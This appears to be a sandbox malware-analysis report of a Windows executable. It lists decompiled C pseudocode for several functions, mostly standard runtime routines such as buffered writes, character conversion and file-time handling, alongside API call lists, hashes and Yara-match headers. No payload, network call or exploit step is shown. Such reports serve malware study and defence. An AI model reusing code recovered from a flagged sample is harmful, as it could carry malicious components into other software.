                                                                                • Opcode Fuzzy Hash: 1a316d783e16cb874dc96d72b9e5f0dd665dc099e9312ae3e52d8c1842a121dd
                                                                                • Instruction Fuzzy Hash: 5BF03031A00A49E2DF201BB2FC0E77F7A75BB82742F850590E5D1A01D4DF71C1B1D265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0040ADC3,00000000,?,?,0040ADC3,?,?,?,?,?,?,?,?,?,00000000,.zip), ref: 00415B78
                                                                                • IsWow64Process.KERNEL32(00000000,?,?,0040ADC3,?,?,?,?,?,?,?,?,?,00000000,.zip), ref: 00415B7F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentWow64
                                                                                • String ID: x64$x86
                                                                                • API String ID: 1905925150-1778291495
                                                                                • Opcode ID: 2d775a19ffc2c3d47ea182222121c587e0b07ecb8047f394a79dc6bb17b927d0
                                                                                • Instruction ID: 3c9d3760a5a26c6918296a9b74b1aaa830c4dff7d88253e2d2940ed795ccf6a6
                                                                                • Opcode Fuzzy Hash: 2d775a19ffc2c3d47ea182222121c587e0b07ecb8047f394a79dc6bb17b927d0
                                                                                • Instruction Fuzzy Hash: A5F0A0B1A44304FBDB20DFA48984A9ABAFCBB00744B10447FA00293241D6B8AF048719
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E004206E9(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t56;
                                                                                				signed int _t60;
                                                                                				void* _t65;
                                                                                				signed int _t66;
                                                                                				signed int _t69;
                                                                                				signed int _t71;
                                                                                				signed int _t72;
                                                                                				signed int _t74;
                                                                                				signed int _t75;
                                                                                				signed int _t78;
                                                                                				signed int _t79;
                                                                                				signed int _t81;
                                                                                				signed int _t85;
                                                                                				signed int _t92;
                                                                                				signed int _t93;
                                                                                				signed int _t94;
                                                                                				signed int _t95;
                                                                                				intOrPtr* _t96;
                                                                                				void* _t97;
                                                                                
                                                                                				_t92 = _a8;
                                                                                				if(_t92 == 0 || _a12 == 0) {
                                                                                					L4:
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t96 = _a16;
                                                                                					_t100 = _t96;
                                                                                					if(_t96 != 0) {
                                                                                						_t79 = _a4;
                                                                                						__eflags = _t79;
                                                                                						if(__eflags == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						_t60 = _t56 | 0xffffffff;
                                                                                						_t88 = _t60 % _t92;
                                                                                						__eflags = _a12 - _t60 / _t92;
                                                                                						if(__eflags > 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						_t93 = _t92 * _a12;
                                                                                						__eflags =  *(_t96 + 0xc) & 0x0000010c;
                                                                                						_v8 = _t79;
                                                                                						_v16 = _t93;
                                                                                						_t78 = _t93;
                                                                                						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
                                                                                							_v12 = 0x1000;
                                                                                						} else {
                                                                                							_v12 =  *(_t96 + 0x18);
                                                                                						}
                                                                                						__eflags = _t93;
                                                                                						if(_t93 == 0) {
                                                                                							L32:
                                                                                							return _a12;
                                                                                						} else {
                                                                                							do {
                                                                                								_t81 =  *(_t96 + 0xc) & 0x00000108;
                                                                                								__eflags = _t81;
                                                                                								if(_t81 == 0) {
                                                                                									L18:
                                                                                									__eflags = _t78 - _v12;
                                                                                									if(_t78 < _v12) {
                                                                                										_t65 = E00425042(_t88, _t93,  *_v8, _t96);
                                                                                										__eflags = _t65 - 0xffffffff;
                                                                                										if(_t65 == 0xffffffff) {
                                                                                											L34:
                                                                                											_t66 = _t93;
                                                                                											L35:
                                                                                											return (_t66 - _t78) / _a8;
                                                                                										}
                                                                                										_v8 = _v8 + 1;
                                                                                										_t69 =  *(_t96 + 0x18);
                                                                                										_t78 = _t78 - 1;
                                                                                										_v12 = _t69;
                                                                                										__eflags = _t69;
                                                                                										if(_t69 <= 0) {
                                                                                											_v12 = 1;
                                                                                										}
                                                                                										goto L31;
                                                                                									}
                                                                                									__eflags = _t81;
                                                                                									if(_t81 == 0) {
                                                                                										L21:
                                                                                										__eflags = _v12;
                                                                                										_t94 = _t78;
                                                                                										if(_v12 != 0) {
                                                                                											_t72 = _t78;
                                                                                											_t88 = _t72 % _v12;
                                                                                											_t94 = _t94 - _t72 % _v12;
                                                                                											__eflags = _t94;
                                                                                										}
                                                                                										_push(_t94);
                                                                                										_push(_v8);
                                                                                										_push(E00426CDE(_t96));
                                                                                										_t71 = E00429E40(_t78, _t88, _t94, _t96, __eflags);
                                                                                										_t97 = _t97 + 0xc;
                                                                                										__eflags = _t71 - 0xffffffff;
                                                                                										if(_t71 == 0xffffffff) {
                                                                                											L36:
                                                                                											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
                                                                                											_t66 = _v16;
                                                                                											goto L35;
                                                                                										} else {
                                                                                											_t85 = _t94;
                                                                                											__eflags = _t71 - _t94;
                                                                                											if(_t71 <= _t94) {
                                                                                												_t85 = _t71;
                                                                                											}
                                                                                											_v8 = _v8 + _t85;
                                                                                											_t78 = _t78 - _t85;
                                                                                											__eflags = _t71 - _t94;
                                                                                											if(_t71 < _t94) {
                                                                                												goto L36;
                                                                                											} else {
                                                                                												L27:
                                                                                												_t93 = _v16;
                                                                                												goto L31;
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                									_t74 = E0041FD54(_t88, _t96);
                                                                                									__eflags = _t74;
                                                                                									if(_t74 != 0) {
                                                                                										goto L34;
                                                                                									}
                                                                                									goto L21;
                                                                                								}
                                                                                								_t75 =  *(_t96 + 4);
                                                                                								__eflags = _t75;
                                                                                								if(__eflags == 0) {
                                                                                									goto L18;
                                                                                								}
                                                                                								if(__eflags < 0) {
                                                                                									_t45 = _t96 + 0xc;
                                                                                									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
                                                                                									__eflags =  *_t45;
                                                                                									goto L34;
                                                                                								}
                                                                                								_t95 = _t78;
                                                                                								__eflags = _t78 - _t75;
                                                                                								if(_t78 >= _t75) {
                                                                                									_t95 = _t75;
                                                                                								}
                                                                                								E00421230( *_t96, _v8, _t95);
                                                                                								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
                                                                                								 *_t96 =  *_t96 + _t95;
                                                                                								_t97 = _t97 + 0xc;
                                                                                								_t78 = _t78 - _t95;
                                                                                								_v8 = _v8 + _t95;
                                                                                								goto L27;
                                                                                								L31:
                                                                                								__eflags = _t78;
                                                                                							} while (_t78 != 0);
                                                                                							goto L32;
                                                                                						}
                                                                                					}
                                                                                					L3:
                                                                                					 *((intOrPtr*)(E00423E5B(_t100))) = 0x16;
                                                                                					E00424EDB();
                                                                                					goto L4;
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                • String ID:
                                                                                • API String ID: 2782032738-0
                                                                                • Opcode ID: bc16e0bd2feff56e4c9a72fb24abce2d26ec488203f3c75d8a871affbdd8751b
                                                                                • Instruction ID: ad7d1dba2903dca4ed89929e9c99b51ebe4db22c85704b0ca9d15c7edeb43f0b
                                                                                • Opcode Fuzzy Hash: bc16e0bd2feff56e4c9a72fb24abce2d26ec488203f3c75d8a871affbdd8751b
                                                                                • Instruction Fuzzy Hash: E741D331B00624DFDB249F65A88469FBBF5AFC0360F64812EE45597282D778ED41CF88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00430DAD(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				char _v8;
                                                                                				signed int _v12;
                                                                                				char _v20;
                                                                                				void* __ebx;
                                                                                				char _t43;
                                                                                				char _t46;
                                                                                				signed int _t53;
                                                                                				signed int _t54;
                                                                                				intOrPtr _t56;
                                                                                				intOrPtr _t57;
                                                                                				int _t58;
                                                                                				char _t59;
                                                                                				short* _t60;
                                                                                				int _t65;
                                                                                				char* _t72;
                                                                                
                                                                                				_t72 = _a8;
                                                                                				if(_t72 == 0 || _a12 == 0) {
                                                                                					L5:
                                                                                					return 0;
                                                                                				} else {
                                                                                					if( *_t72 != 0) {
                                                                                						E0041EB96(0,  &_v20, _a16);
                                                                                						_t43 = _v20;
                                                                                						__eflags =  *(_t43 + 0x14);
                                                                                						if( *(_t43 + 0x14) != 0) {
                                                                                							_t46 = E00430495( *_t72 & 0x000000ff,  &_v20);
                                                                                							__eflags = _t46;
                                                                                							if(_t46 == 0) {
                                                                                								__eflags = _a4;
                                                                                								_t40 = _v20 + 4; // 0x840ffff8
                                                                                								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                								if(__eflags != 0) {
                                                                                									L10:
                                                                                									__eflags = _v8;
                                                                                									if(_v8 != 0) {
                                                                                										_t53 = _v12;
                                                                                										_t11 = _t53 + 0x70;
                                                                                										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                										__eflags =  *_t11;
                                                                                									}
                                                                                									return 1;
                                                                                								}
                                                                                								L21:
                                                                                								_t54 = E00423E5B(__eflags);
                                                                                								 *_t54 = 0x2a;
                                                                                								__eflags = _v8;
                                                                                								if(_v8 != 0) {
                                                                                									_t54 = _v12;
                                                                                									_t33 = _t54 + 0x70;
                                                                                									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                									__eflags =  *_t33;
                                                                                								}
                                                                                								return _t54 | 0xffffffff;
                                                                                							}
                                                                                							_t56 = _v20;
                                                                                							_t15 = _t56 + 0xac; // 0xff0734ff
                                                                                							_t65 =  *_t15;
                                                                                							__eflags = _t65 - 1;
                                                                                							if(_t65 <= 1) {
                                                                                								L17:
                                                                                								_t24 = _t56 + 0xac; // 0xff0734ff
                                                                                								__eflags = _a12 -  *_t24;
                                                                                								if(__eflags < 0) {
                                                                                									goto L21;
                                                                                								}
                                                                                								__eflags = _t72[1];
                                                                                								if(__eflags == 0) {
                                                                                									goto L21;
                                                                                								}
                                                                                								L19:
                                                                                								_t26 = _t56 + 0xac; // 0xff0734ff
                                                                                								_t57 =  *_t26;
                                                                                								__eflags = _v8;
                                                                                								if(_v8 == 0) {
                                                                                									return _t57;
                                                                                								}
                                                                                								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                								return _t57;
                                                                                							}
                                                                                							__eflags = _a12 - _t65;
                                                                                							if(_a12 < _t65) {
                                                                                								goto L17;
                                                                                							}
                                                                                							__eflags = _a4;
                                                                                							_t21 = _t56 + 4; // 0x840ffff8
                                                                                							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                							__eflags = _t58;
                                                                                							_t56 = _v20;
                                                                                							if(_t58 != 0) {
                                                                                								goto L19;
                                                                                							}
                                                                                							goto L17;
                                                                                						}
                                                                                						_t59 = _a4;
                                                                                						__eflags = _t59;
                                                                                						if(_t59 != 0) {
                                                                                							 *_t59 =  *_t72 & 0x000000ff;
                                                                                						}
                                                                                						goto L10;
                                                                                					} else {
                                                                                						_t60 = _a4;
                                                                                						if(_t60 != 0) {
                                                                                							 *_t60 = 0;
                                                                                						}
                                                                                						goto L5;
                                                                                					}
                                                                                				}
                                                                                			}



















                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00430DE1
                                                                                • __isleadbyte_l.LIBCMT ref: 00430E14
                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,FF0734FF,?,00000000,?,?,?,00429936,?,?,00000001), ref: 00430E45
                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00429936,?,?,00000001), ref: 00430EB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: cca740873de6100d0439fcb3b3ed26cbfbc947964d1ef0800d9026635917cbb4
                                                                                • Instruction ID: 8d6d57008dd06d66464590a9c1f0dc6c998683f410bfc4bb48ed8463796450c2
                                                                                • Opcode Fuzzy Hash: cca740873de6100d0439fcb3b3ed26cbfbc947964d1ef0800d9026635917cbb4
                                                                                • Instruction Fuzzy Hash: 8F31F531600255EFCB10CFA4C8A1AAB7BF1BF09310F149AAEE4619B291E734ED40DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C7E605
                                                                                • __isleadbyte_l.LIBCMT ref: 00C7E639
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00C71E8F,?,00000000,00000000,?,?,?,?,00C71E8F,00000000,?), ref: 00C7E66A
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00C71E8F,00000001,00000000,00000000,?,?,?,?,00C71E8F,00000000,?), ref: 00C7E6D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 96400eb25e237afa90320cae856eda81f6f5d1cbf59716e31233b7de66c6f1c1
                                                                                • Instruction ID: 42d28d0623d54144757b8992b3ed8abd580cc5e5b76ecac494c64c76ba7c7aef
                                                                                • Opcode Fuzzy Hash: 96400eb25e237afa90320cae856eda81f6f5d1cbf59716e31233b7de66c6f1c1
                                                                                • Instruction Fuzzy Hash: 2831B272A00299EFDB20DF68C880AAE3BA5FF09315F15C5E9F4699B191E330DE40DB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0041DB2A(signed int _a4, signed int _a8, signed int _a9, char _a10) {
                                                                                				signed char _v7;
                                                                                				signed char _v8;
                                                                                				signed char _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t42;
                                                                                				signed int _t47;
                                                                                				signed int _t51;
                                                                                				signed int _t52;
                                                                                				intOrPtr _t57;
                                                                                				signed int _t59;
                                                                                				void* _t63;
                                                                                				signed int _t64;
                                                                                				void* _t72;
                                                                                				signed int _t76;
                                                                                
                                                                                				_t76 = _a8;
                                                                                				_t79 = _t76;
                                                                                				if(_t76 != 0) {
                                                                                					_v16 =  *_t76;
                                                                                					_t42 =  *((intOrPtr*)(_t76 + 4));
                                                                                				} else {
                                                                                					_v16 =  *((intOrPtr*)(E00422FD4(_t63, _t72, _t76, _t79) + 8));
                                                                                					_t42 = E00422FAE(_t63, _t72, _t76, _t79);
                                                                                				}
                                                                                				_v20 = _t42;
                                                                                				if(_v16 != 0) {
                                                                                					_push(_t63);
                                                                                					_t64 = _a4;
                                                                                					__eflags = _t64 - 0x100;
                                                                                					if(_t64 >= 0x100) {
                                                                                						L11:
                                                                                						__eflags = _t76;
                                                                                						if(__eflags != 0) {
                                                                                							_v12 = _t64;
                                                                                							_v12 = _v12 >> 8;
                                                                                							_t47 =  *( *((intOrPtr*)(_t76 + 8)) + (_v12 & 0x000000ff) * 2) >> 0x0000000f & 0x00000001;
                                                                                							__eflags = _t47;
                                                                                							L14:
                                                                                							__eflags = _t47;
                                                                                							if(__eflags == 0) {
                                                                                								_a8 = _t64;
                                                                                								_a9 = 0;
                                                                                								__eflags = 1;
                                                                                							} else {
                                                                                								_push(2);
                                                                                								_a8 = _v12;
                                                                                								_a9 = _t64;
                                                                                								_a10 = 0;
                                                                                								_pop(1);
                                                                                							}
                                                                                							_t51 = E00422A1B(_t64, __eflags, 0, _v16, 0x100,  &_a8, 1,  &_v8, 3, _v20, 1);
                                                                                							__eflags = _t51;
                                                                                							if(_t51 != 0) {
                                                                                								__eflags = _t51 - 1;
                                                                                								_t52 = _v8 & 0x000000ff;
                                                                                								if(_t51 != 1) {
                                                                                									_t52 = _t52 << 0x00000008 | _v7 & 0x000000ff;
                                                                                									__eflags = _t52;
                                                                                								}
                                                                                								goto L21;
                                                                                							} else {
                                                                                								L18:
                                                                                								_t52 = _t64;
                                                                                								L21:
                                                                                								return _t52;
                                                                                							}
                                                                                						}
                                                                                						L12:
                                                                                						_v12 = _t64;
                                                                                						_v12 = _v12 >> 8;
                                                                                						_t47 =  *(E00422A61(_t64, _t72, _t76, __eflags) + (_v12 & 0x000000ff) * 2) & 0x8000;
                                                                                						goto L14;
                                                                                					}
                                                                                					__eflags = _t76;
                                                                                					if(_t76 != 0) {
                                                                                						_t57 =  *((intOrPtr*)(_t76 + 8));
                                                                                						__eflags =  *(_t57 + _t64 * 2) & 0x00000001;
                                                                                						if(( *(_t57 + _t64 * 2) & 0x00000001) == 0) {
                                                                                							goto L18;
                                                                                						}
                                                                                						goto L11;
                                                                                					}
                                                                                					__eflags = E00422ADB(_t64);
                                                                                					if(__eflags != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					goto L18;
                                                                                				} else {
                                                                                					_t59 = _a4;
                                                                                					if(_t59 - 0x41 > 0x19) {
                                                                                						return _t59;
                                                                                					}
                                                                                					return _t59 + 0x20;
                                                                                				}
                                                                                			}






















                                                                                APIs
                                                                                • ____lc_handle_func.LIBCMT ref: 0041DB3A
                                                                                  • Part of subcall function 00422FD4: __getptd.LIBCMT ref: 00422FD4
                                                                                • ____lc_codepage_func.LIBCMT ref: 0041DB45
                                                                                  • Part of subcall function 00422FAE: __getptd.LIBCMT ref: 00422FAE
                                                                                • ___pctype_func.LIBCMT ref: 0041DBAA
                                                                                • ___crtLCMapStringA.LIBCMT ref: 0041DC10
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$String____lc_codepage_func____lc_handle_func___crt___pctype_func
                                                                                • String ID:
                                                                                • API String ID: 3477544643-0
                                                                                • Opcode ID: fd5a285b8f110fab49c7bb52ebbf79be4fb128a6d147ffa5142546df80797410
                                                                                • Instruction ID: 89f854980cd5a03fb148403272f8b3ab2025cc482cf61d5f4636a3f22ba1e105
                                                                                • Opcode Fuzzy Hash: fd5a285b8f110fab49c7bb52ebbf79be4fb128a6d147ffa5142546df80797410
                                                                                • Instruction Fuzzy Hash: D131FBB1D08258BADF21CF59C9817EEBBB4AF10304F15845BE856DB251D2BCEAC0CB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0041C6AF(intOrPtr __ebx, void* _a4, void _a8) {
                                                                                				signed int _v8;
                                                                                				struct _SYSTEMTIME _v24;
                                                                                				signed short _v28;
                                                                                				signed short _v32;
                                                                                				void* _v36;
                                                                                				struct _FILETIME _v44;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t42;
                                                                                				void* _t44;
                                                                                				void _t48;
                                                                                				intOrPtr _t54;
                                                                                				intOrPtr _t62;
                                                                                				void* _t65;
                                                                                				signed int _t71;
                                                                                
                                                                                				_t62 = __ebx;
                                                                                				_t42 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t42 ^ _t71;
                                                                                				_t44 = _a4;
                                                                                				_t69 = 0;
                                                                                				_t70 = __ebx + 0x70;
                                                                                				_v36 = _t44;
                                                                                				 *(__ebx + 0x7c) = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x84)) = 0;
                                                                                				 *((char*)(__ebx + 0x80)) = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x78)) = 0;
                                                                                				 *_t70 = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x90)) = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x74)) = 0;
                                                                                				if(_t44 == 0 || _t44 == 0xffffffff) {
                                                                                					_t45 = 0x10000;
                                                                                				} else {
                                                                                					if(SetFilePointer( *(__ebx + 4), 0, 0, 1) == 0xffffffff) {
                                                                                						_t48 = _a8;
                                                                                						 *_t70 =  *_t70 | 0xffffffff;
                                                                                						 *((intOrPtr*)(__ebx + 0x4c)) = 0x80000000;
                                                                                						if(_t48 != 0) {
                                                                                							 *_t70 = _t48;
                                                                                						}
                                                                                						 *((char*)(_t62 + 0x6c)) = 0;
                                                                                						GetLocalTime( &_v24);
                                                                                						SystemTimeToFileTime( &_v24,  &_v44);
                                                                                						_push(_v44.dwHighDateTime);
                                                                                						_t69 =  &_v28;
                                                                                						_t70 =  &_v32;
                                                                                						E0041C12D( &_v28,  &_v32, _v44.dwLowDateTime);
                                                                                						_t54 = E0041C10B(_v44.dwLowDateTime, _v44.dwHighDateTime);
                                                                                						 *((intOrPtr*)(_t62 + 0x50)) = _t54;
                                                                                						 *((intOrPtr*)(_t62 + 0x58)) = _t54;
                                                                                						 *((intOrPtr*)(_t62 + 0x60)) = _t54;
                                                                                						_t65 = _t68;
                                                                                						 *((intOrPtr*)(_t62 + 0x5c)) = _t65;
                                                                                						 *((intOrPtr*)(_t62 + 0x64)) = _t65;
                                                                                						 *(_t62 + 0x68) = (_v32 & 0x0000ffff) << 0x00000010 | _v28 & 0x0000ffff;
                                                                                						 *((intOrPtr*)(_t62 + 0x54)) = _t68;
                                                                                						 *((intOrPtr*)(_t62 + 0x7c)) = _v36;
                                                                                						goto L5;
                                                                                					} else {
                                                                                						_t70 = _v36;
                                                                                						_t68 = __ebx + 0x50;
                                                                                						if(E0041C194(_t70, __ebx + 0x50, __ebx + 0x4c, _t70, __ebx + 0x68) == 0) {
                                                                                							SetFilePointer(_t70, 0, 0, 0);
                                                                                							 *((char*)(__ebx + 0x6c)) = 1;
                                                                                							 *(__ebx + 0x7c) = _t70;
                                                                                							L5:
                                                                                							_t45 = 0;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return E0041DEB4(_t45, _t62, _v8 ^ _t71, _t68, _t69, _t70);
                                                                                			}



















                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00440C98,00000000,?,?,?,0041CC90,?,000003E8,?,00440C98,?,00000000), ref: 0041C702
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0041CC90,?,000003E8,?,00440C98,?), ref: 0041C732
                                                                                • GetLocalTime.KERNEL32(000003E8,?,?,?,0041CC90,?,000003E8,?,00440C98,?,00000000), ref: 0041C75E
                                                                                • SystemTimeToFileTime.KERNEL32(000003E8,?,?,?,?,0041CC90,?,000003E8,?,00440C98,?,00000000), ref: 0041C76C
                                                                                  • Part of subcall function 0041C194: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041C1C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                • String ID:
                                                                                • API String ID: 3986731826-0
                                                                                • Opcode ID: f0a5f536456e36f3f1e3e9472c67a50ad49a119b57bd3d8a55eade869837fa14
                                                                                • Instruction ID: a4a204b0f49aa3fb0e77698da652ea75eef8bfc0e4b6c5fdb941cde4cbd239c3
                                                                                • Opcode Fuzzy Hash: f0a5f536456e36f3f1e3e9472c67a50ad49a119b57bd3d8a55eade869837fa14
                                                                                • Instruction Fuzzy Hash: 8E41497190020A9BCF14DF69C880ADEBBF8FF48310F1041AAE864EA296D7749985CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E00417286(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				CHAR* _t27;
                                                                                				signed int _t28;
                                                                                				void* _t34;
                                                                                				CHAR* _t35;
                                                                                				void* _t44;
                                                                                				signed int _t45;
                                                                                				signed int _t46;
                                                                                				signed int _t53;
                                                                                				signed int _t57;
                                                                                				void* _t60;
                                                                                				void* _t61;
                                                                                
                                                                                				_push(8);
                                                                                				E00421975(E00436E16, __ebx, __edi, __esi);
                                                                                				 *(_t61 - 0x14) =  *(_t61 - 0x14) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(_t61 + 8));
                                                                                				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
                                                                                				_t27 =  *(_t61 + 0xc);
                                                                                				if( *((intOrPtr*)(_t61 + 0x20)) < 0x10) {
                                                                                					_t27 = _t61 + 0xc;
                                                                                				}
                                                                                				_t60 = lstrlenA;
                                                                                				_t28 = lstrlenA(_t27);
                                                                                				_t57 = 3;
                                                                                				_t45 = _t28;
                                                                                				_t53 = _t28 % _t57;
                                                                                				if(_t53 != 0) {
                                                                                					_t45 = _t45 - _t53 + _t57;
                                                                                				}
                                                                                				_t31 = _t45 << 3;
                                                                                				_t46 = 6;
                                                                                				_t34 = E0041E042((_t45 << 3) % _t46, _t57, _t60, _t31 / _t46 + 1);
                                                                                				_t58 =  *(_t61 + 0xc);
                                                                                				_t44 = _t34;
                                                                                				_t35 =  *(_t61 + 0xc);
                                                                                				if( *((intOrPtr*)(_t61 + 0x20)) < 0x10) {
                                                                                					_t35 = _t61 + 0xc;
                                                                                					_t58 = _t35;
                                                                                				}
                                                                                				E00417131(_t58, _t44, lstrlenA(_t35));
                                                                                				E0040C606( *((intOrPtr*)(_t61 - 0x10)), _t44);
                                                                                				E00402C34(_t61 + 0xc, 1, 0);
                                                                                				return E00421A4D( *((intOrPtr*)(_t61 - 0x10)));
                                                                                			}

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0041728D
                                                                                • lstrlenA.KERNEL32(?,00000008,0041165E,?,?,?,?,00000001,?,00000001,?,?,00000000,?,00000000), ref: 004172B3
                                                                                • _malloc.LIBCMT ref: 004172D4
                                                                                • lstrlenA.KERNEL32(?,?,?,00000001,?,00000001,?,?,00000000,?,00000000,?,?,?,?,00000000), ref: 004172ED
                                                                                Memory Dump Source
